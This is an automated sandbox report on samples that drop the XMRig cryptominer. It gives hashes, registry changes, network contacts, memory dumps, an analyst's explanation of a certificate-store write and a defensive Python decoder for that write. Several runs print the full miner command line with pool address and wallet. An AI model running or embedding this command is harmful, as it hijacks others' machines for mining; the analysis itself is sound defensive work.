MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3372-14-0x0000014206CA0000-0x0000014206CC0000-memory.dmp

memory/3372-15-0x0000014206CF0000-0x0000014206D10000-memory.dmp

memory/3372-16-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-18-0x0000014206D30000-0x0000014206D50000-memory.dmp

memory/3372-17-0x0000014206D10000-0x0000014206D30000-memory.dmp

memory/3372-19-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-20-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-21-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-22-0x0000014206D10000-0x0000014206D30000-memory.dmp

memory/3372-23-0x0000014206D30000-0x0000014206D50000-memory.dmp

memory/3372-24-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-25-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-26-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-27-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-28-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-29-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-30-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-31-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-32-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-33-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-34-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-35-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-36-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-37-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-38-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-39-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-40-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-41-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-42-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-43-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-44-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-45-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-46-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-47-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-48-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-49-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-50-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-51-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-52-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-53-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-54-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-55-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-56-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-57-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-58-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-59-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-60-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-61-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-62-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-63-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-64-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-65-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-66-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-67-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-68-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-69-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-70-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-71-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-72-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-73-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-74-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-75-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-76-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-77-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-78-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-79-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-80-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-81-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

memory/3372-82-0x00007FF7A47D0000-0x00007FF7A52D3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:47

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches recorded, all fields N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
BE 88.221.83.184:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 184.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 47.23.48.23.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/412-14-0x000001E2761E0000-0x000001E276200000-memory.dmp

memory/412-15-0x000001E2779E0000-0x000001E277A00000-memory.dmp

memory/412-16-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-18-0x000001E277A20000-0x000001E277A40000-memory.dmp

memory/412-17-0x000001E277A00000-0x000001E277A20000-memory.dmp

memory/412-19-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-20-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-23-0x000001E277A20000-0x000001E277A40000-memory.dmp

memory/412-22-0x000001E277A00000-0x000001E277A20000-memory.dmp

memory/412-21-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-24-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-25-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-26-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-27-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-28-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-29-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-30-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-31-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-32-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-33-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-34-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-35-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-36-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-37-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-38-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-39-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-40-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-41-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-42-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-43-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-44-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-45-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-46-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-47-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-48-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-49-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-50-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-51-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-52-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-53-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-54-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-55-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-56-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-57-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-58-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-59-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-60-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-61-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-62-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-63-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-64-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-65-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-66-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-67-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-68-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-69-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-70-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-71-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-72-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-73-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-74-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-75-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-76-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-77-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-78-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-79-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-80-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-81-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

memory/412-82-0x00007FF6EE9C0000-0x00007FF6EF4C3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches recorded, all fields N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8f
b142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
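The Modifies system certificate store signature, tagged evasion/spyware/trojan, needs a caveat before it drives a verdict. The key written is under AuthRoot, the store that Windows' automatic root update fills on demand while building a certificate chain, and the Blob value recorded above decodes to the public Comodo/Sectigo "AAA Certificate Services" root: its friendly-name property is "Sectigo (AAA)", its SHA-1 property equals the key name D1EB23A46D17D68FD92564C2F1F1601764D8E349, its SHA-256 property d7a7a0fb… is that root's published fingerprint, and the DER certificate at the end of the value carries the subject "Comodo CA Limited, AAA Certificate Services". That is consistent with main - Copy (9) - Copy.exe fetching the xmrig-6.21.0 release over HTTPS from github.com and objects.githubusercontent.com (the Network table below), not with the sample installing its own trust anchor; a rogue root would normally land under \ROOT\Certificates in the machine or user hive with a thumbprint that matches nothing in the Microsoft Trusted Root Program. The same write, with the value elided, is what behavioral12, behavioral10 and behavioral11 above report. The Python below is an added example, not part of the sandbox report, that walks the value's (PropertyID, Reserved, Length, Data) records, decodes the friendly name, the stored hashes and the enhanced-key-usage OIDs, and checks the SHA-1 property against the key name. The property-ID names are the wincrypt.h constants; the sample input is the leading part of the Blob recorded above, stopping before the final CERT_CERT record that carries the 1078-byte certificate, which is left out here for length (when it is present the code also hashes it and compares with the SHA-1 property).

```python
import hashlib
import struct

# Property IDs (wincrypt.h) that occur in this blob; anything else is shown as a raw number.
PROP_NAMES = {
    0x03: "CERT_SHA1_HASH", 0x09: "CERT_ENHKEY_USAGE", 0x0B: "CERT_FRIENDLY_NAME",
    0x0F: "CERT_SIGNATURE_HASH", 0x14: "CERT_KEY_IDENTIFIER", 0x19: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH",
    0x1D: "CERT_SUBJECT_NAME_MD5_HASH", 0x20: "CERT_CERT", 0x53: "CERT_ROOT_PROGRAM_CERT_POLICIES",
    0x62: "CERT_AUTH_ROOT_SHA256_HASH",
}

AUTHROOT_KEY = "D1EB23A46D17D68FD92564C2F1F1601764D8E349"   # key name under AuthRoot\Certificates
# Leading records of the Blob value recorded for that key above. The final CERT_CERT
# record (ID 0x20, the 1078-byte DER certificate) is left off here for length.
BLOB_HEX = (
    "1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2"                      # subject public key MD5
    "030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349"              # SHA-1 thumbprint
    "1d00000001000000100000002e0d6875874a44c820912e85e964cfdb"                      # subject name MD5
    "140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4"              # subject key identifier
    "0b000000010000001c0000005300650063007400690067006f002000280041004100410029000000"      # friendly name
    "620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"  # SHA-256
    "53000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0"
    "301b060567810c010330123010060a2b0601040182373c0101030200c0"                    # root program policies
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308"
    "0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286"              # signature hash
)


def parse_cert_blob(blob: bytes) -> dict:
    """Walk the (PropertyID, Reserved=1, Length, Data) records of a Blob value, in order."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed record 0x{prop_id:02x} at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def decode_oid(body: bytes) -> str:
    """Dotted form of a DER OBJECT IDENTIFIER body (base-128 arcs, high bit = continue)."""
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def decode_oid_sequence(der: bytes) -> list:
    """OIDs inside a short-form DER SEQUENCE, as used by the enhanced-key-usage property."""
    if der[0] != 0x30 or der[1] & 0x80:
        raise ValueError("expected a short-form SEQUENCE")
    inner, off, oids = der[2:2 + der[1]], 0, []
    while off < len(inner):
        tag, length = inner[off], inner[off + 1]
        if tag == 0x06:
            oids.append(decode_oid(inner[off + 2:off + 2 + length]))
        off += 2 + length
    return oids


def describe_authroot_entry(key_thumbprint: str, blob_hex: str) -> dict:
    """Summarise one AuthRoot\\Certificates\\<thumbprint>\\Blob value for triage."""
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    sha1_prop = props.get(0x03, b"").hex()
    return {
        "properties": [PROP_NAMES.get(pid, f"0x{pid:02x}") for pid in props],
        "friendly_name": props.get(0x0B, b"").decode("utf-16-le").rstrip("\x00"),
        "sha1": sha1_prop,
        "sha256": props.get(0x62, b"").hex(),
        "subject_key_id": props.get(0x14, b"").hex(),
        "eku": decode_oid_sequence(props[0x09]) if 0x09 in props else [],
        # The key name is the SHA-1 thumbprint; a mismatch means the value was tampered with.
        "thumbprint_matches_key": sha1_prop == key_thumbprint.lower(),
        # Only checkable when the DER certificate record is present in the value.
        "der_sha1_matches": hashlib.sha1(props[0x20]).hexdigest() == sha1_prop if 0x20 in props else None,
    }


if __name__ == "__main__":
    for key, value in describe_authroot_entry(AUTHROOT_KEY, BLOB_HEX).items():
        print(f"{key}: {value}")
```

The EKU list it recovers (serverAuth, clientAuth, codeSigning, emailProtection, IPsec end system and tunnel, timeStamping, and the Microsoft EFS OID 1.3.6.1.4.1.311.10.3.4) is the usage set Windows assigns to a root-program CA, another sign this is an auto-update entry rather than a purpose-built rogue root. When exporting a real value with reg.exe or PowerShell, pass the full hex so the CERT_CERT record is present and der_sha1_matches becomes a true/false result instead of None.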

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3120-14-0x0000014B62190000-0x0000014B621B0000-memory.dmp

memory/3120-15-0x0000014B63CA0000-0x0000014B63CC0000-memory.dmp

memory/3120-16-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-19-0x0000014B63CE0000-0x0000014B63D00000-memory.dmp

memory/3120-18-0x0000014B63CC0000-0x0000014B63CE0000-memory.dmp

memory/3120-17-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-20-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-21-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-22-0x0000014B63CC0000-0x0000014B63CE0000-memory.dmp

memory/3120-23-0x0000014B63CE0000-0x0000014B63D00000-memory.dmp

memory/3120-24-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-25-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-26-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

